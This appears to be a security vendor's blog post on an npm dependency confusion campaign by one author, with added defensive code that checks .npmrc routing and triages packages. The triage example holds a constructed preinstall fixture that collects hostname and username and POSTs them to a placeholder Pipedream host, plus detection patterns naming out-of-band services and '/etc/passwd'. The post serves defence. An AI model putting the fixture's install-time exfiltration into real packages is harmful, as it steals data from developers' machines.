Single Author Uploaded 168 Packages to npm as Part of a Massive Dependency Confusion Attack
Using Mend Supply Chain Defender, Mend’s research team reported and blocked dozens of packages from the same author. These packages targeted developers at many companies and frameworks, including Slack, Cloudflare, Datadog, Metamask, React, Shopify, OpenSea, Angular and more.
A dependency confusion attack abuses the way package managers resolve names rather than any mistake by the developer. When an attacker publishes a package to a public registry under the same name as an internal, privately hosted package, a build that consults the public registry (or treats the higher version number found there as the newer release) pulls the attacker’s copy instead of the internal one. It is one of the most effective supply chain attacks precisely because the developer does nothing unusual: installing a package with exactly the name they intended is enough.
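The resolution rule described above can be checked before it bites. The following is an added example, not code from the Mend article or from the packages it describes: it parses the registry settings of an .npmrc, works out which registry npm would use for each dependency in a package.json, and reports the internal package names that would be resolved against the public registry. The package.json, .npmrc and list of internal names are constructed for the example, and the organisation name `acme` and its registry URL are assumptions.

```javascript
// Added example (not from the Mend article): report which internal package
// names in a package.json would be fetched from the public npm registry
// instead of an internal one. All inputs below are constructed.

const PUBLIC_REGISTRY = "https://registry.npmjs.org/";

function normalizeRegistry(url) {
  return url.trim().replace(/\/+$/, "").toLowerCase();
}

function isPublicRegistry(url) {
  return normalizeRegistry(url) === normalizeRegistry(PUBLIC_REGISTRY);
}

// Parse the registry-related lines of an .npmrc: the default "registry=" key
// and any "@scope:registry=" overrides. Other keys and comments are ignored.
function parseNpmrc(text) {
  const cfg = { registry: PUBLIC_REGISTRY, scoped: {} };
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || line.startsWith(";")) continue;
    const eq = line.indexOf("=");
    if (eq === -1) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();
    if (key === "registry") {
      cfg.registry = value;
    } else if (key.startsWith("@") && key.endsWith(":registry")) {
      cfg.scoped[key.slice(0, -":registry".length)] = value;
    }
  }
  return cfg;
}

// npm resolves a scoped package through its scope's registry when one is
// configured, and everything else through the default registry.
function registryFor(name, cfg) {
  if (name.startsWith("@") && name.includes("/")) {
    const scope = name.slice(0, name.indexOf("/"));
    if (cfg.scoped[scope]) return cfg.scoped[scope];
  }
  return cfg.registry;
}

// internalNames: package names the organisation publishes privately.
// Returns the internal packages that would be looked up on the public
// registry, i.e. the names an attacker could claim by publishing them there.
function findConfusable(packageJson, npmrcText, internalNames) {
  const cfg = parseNpmrc(npmrcText);
  const deps = Object.assign({}, packageJson.dependencies, packageJson.devDependencies);
  const internal = new Set(internalNames);
  const findings = [];
  for (const name of Object.keys(deps)) {
    if (!internal.has(name)) continue;
    const registry = registryFor(name, cfg);
    if (isPublicRegistry(registry)) {
      findings.push({ name, spec: deps[name], registry });
    }
  }
  return findings;
}

// Constructed sample: an unscoped internal package (exposed), a scoped internal
// package routed to an assumed internal registry (safe), and a public package.
const SAMPLE_PACKAGE_JSON = {
  name: "payments-service",
  dependencies: {
    "acme-notifications": "^1.2.0",
    "@acme/billing": "~2.0.1",
    express: "^4.18.2",
  },
};
const SAMPLE_NPMRC = [
  "# default registry deliberately left at the public one",
  "@acme:registry=https://npm.acme.internal/",
].join("\n");
const SAMPLE_INTERNAL = ["acme-notifications", "@acme/billing"];

const findings = findConfusable(SAMPLE_PACKAGE_JSON, SAMPLE_NPMRC, SAMPLE_INTERNAL);
console.log(JSON.stringify(findings, null, 2));
```

The check flags `acme-notifications` and not `@acme/billing`: routing a scope you own to your internal registry is what removes the name from public resolution. Two caveats apply. If the internal registry is a proxy that falls through to npmjs.org for names it does not hold, the public copy can still win, so the same check has to be applied to the proxy's configuration, not just to .npmrc. And the check only covers names you tell it are internal, so it is only as good as the inventory of private packages it is given.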
What Happened?
One npm user, 'amgadesam007', uploaded 168 packages to npm targeting various companies and frameworks. The account was active from June 15 until it was taken down today, June 20. In that time frame, packages were uploaded with names such as:
‘slack-notifications’
‘Atomic-angular’
‘Cloudflare-docs-engine’
‘Datadog-app’
‘Metamask-state-log-explorer’
‘Shopify-marketplaces-buyer-app’
‘opensea-creatures’
As the first comment in index.js suggests, the author is a security researcher who goes by mega7 on HackerOne.
That the author is a security researcher does not change the fact that these packages are malicious: they collect sensitive information from the machine that installs them and send it out through interactsh or Pipedream.
All of the packages contain similar code intended to exfiltrate user information:
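The traits described above (an install-time hook, code that gathers host details, and a send to an out-of-band service) can be screened for before a package is allowed into a build. The following is an added example, not code from the Mend article or from the packages it describes: it triages an npm package's package.json and source files offline and returns a verdict. Both package samples are constructed for the example; the interactsh and Pipedream domains come from the article, and the remaining out-of-band domains in the list are assumed additions.

```javascript
// Added example (not from the Mend article): offline triage of an npm package
// for an install hook combined with host-data collection and an out-of-band
// send. Both package samples below are constructed for this example.

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Host and user enumeration primitives typical of exfiltration payloads.
const COLLECT = [
  /os\.hostname\(/, /os\.userInfo\(/, /os\.networkInterfaces\(/,
  /process\.env\b/, /\/etc\/passwd/,
];
// Ways of getting the collected data off the machine.
const SEND = [/https?\.(request|get)\(/, /dns\.(lookup|resolve)/, /fetch\(/, /child_process/];
// Out-of-band services: interactsh and Pipedream are named in the article;
// the other entries are assumed additions for the example.
const OOB = [
  /interact\.sh/i, /oast\.(pro|live|site|online|fun|me)/i, /pipedream\.net/i,
  /burpcollaborator\.net/i, /requestbin/i,
];

// pkg = { packageJson: {...}, files: { "index.js": "<source text>", ... } }
function triagePackage(pkg) {
  const findings = [];
  const scripts = (pkg.packageJson && pkg.packageJson.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) {
      findings.push({ kind: "lifecycle-hook", file: "package.json", detail: `${hook}: ${scripts[hook]}` });
    }
  }
  for (const [file, src] of Object.entries(pkg.files || {})) {
    const oob = OOB.filter((re) => re.test(src)).map((re) => re.source);
    if (oob.length) findings.push({ kind: "oob-endpoint", file, detail: oob.join(", ") });
    const collects = COLLECT.some((re) => re.test(src));
    const sends = SEND.some((re) => re.test(src));
    if (collects && sends) {
      findings.push({ kind: "collect-and-send", file, detail: "host data gathered and sent from the same file" });
    }
  }
  return findings;
}

// block: talks to an OOB service or gathers-and-sends host data;
// review: an install hook with nothing else suspicious (legitimate native
// modules use these too); pass: none of the above.
function verdict(findings) {
  const kinds = new Set(findings.map((f) => f.kind));
  if (kinds.has("oob-endpoint") || kinds.has("collect-and-send")) return "block";
  if (kinds.has("lifecycle-hook")) return "review";
  return "pass";
}

// Constructed sample of the shape the article describes: a preinstall hook
// runs code that collects hostname, user and directory and POSTs them to a
// Pipedream endpoint. The version is high so it outranks an internal package.
const SUSPICIOUS_PKG = {
  packageJson: { name: "acme-notifications", version: "99.0.0", scripts: { preinstall: "node index.js" } },
  files: {
    "index.js": [
      "const os = require('os');",
      "const https = require('https');",
      "const info = JSON.stringify({ h: os.hostname(), u: os.userInfo().username, d: __dirname });",
      "const req = https.request({ hostname: 'SUBDOMAIN.m.pipedream.net', method: 'POST', path: '/' });",
      "req.end(info);",
    ].join("\n"),
  },
};

// Constructed benign sample: no hooks, no collection, no network activity.
const BENIGN_PKG = {
  packageJson: { name: "pad-left-ish", version: "1.0.0", scripts: { test: "node test.js" } },
  files: { "index.js": "module.exports = (s, n) => String(s).padStart(n);" },
};

for (const pkg of [SUSPICIOUS_PKG, BENIGN_PKG]) {
  const f = triagePackage(pkg);
  console.log(pkg.packageJson.name, verdict(f), f);
}
```

This is a heuristic, not a scanner: gathering environment variables and making HTTP requests in one file is also what a proxy-aware HTTP client does, so "block" should mean "quarantine and read the source", and a "review" verdict on a lifecycle hook is routine for packages with native builds. Running installs with `ignore-scripts` set removes the preinstall vector entirely and is the cheaper control where no package in the tree needs build hooks.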
How to protect your organization from supply chain attacks
Supply chain attacks keep evolving and growing more frequent, and dependency confusion attempts in particular are very common. The simplest way to cover this attack surface is an automated supply chain security solution such as Mend Supply Chain Defender, which alerts you when a malicious package is imported from an open source registry. The standard hardening steps still apply alongside it: publish internal packages under a scope you control and route that scope to your internal registry in .npmrc, claim your internal package names on the public registry so that nobody else can, and install from a lockfile (npm ci) so that a newly published, higher-versioned public package is not picked up silently.
Mend enterprise customers using JFrog Artifactory as a private repository manager can prevent malicious open source software from entering their code base using the Mend Supply Chain Defender Integration with JFrog Artifactory.
Learn how Mend Supply Chain Defender blocks software supply chain attacks.